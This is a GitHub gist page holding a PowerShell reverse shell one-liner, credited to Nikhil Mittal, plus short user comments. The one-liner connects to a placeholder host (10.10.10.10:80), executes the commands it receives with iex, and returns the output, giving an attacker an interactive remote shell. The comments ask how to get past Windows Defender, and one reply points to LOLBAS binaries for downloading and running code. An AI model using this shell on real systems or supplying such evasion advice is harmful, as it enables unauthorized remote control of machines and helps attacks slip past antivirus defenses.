Last active
May 23, 2025 14:09
-
Star
(192)
You must be signed in to star a gist -
Fork
(67)
You must be signed in to fork a gist
-
-
Save egre55/c058744a4240af6515eb32b2d33fbed3 to your computer and use it in GitHub Desktop.
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
Will try to investigate some other options, thanks anyways!
Do you maybe know something else that can execute some code but Defender is keeping less tabs on it? Some other binary or anything?
You can check out various legitimate binaries on Windows that could be used to download and execute stuff from here https://lolbas-project.github.io/
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Well if it is blocking everything, maybe try a different way to deliver your payload? Instead of using powershell?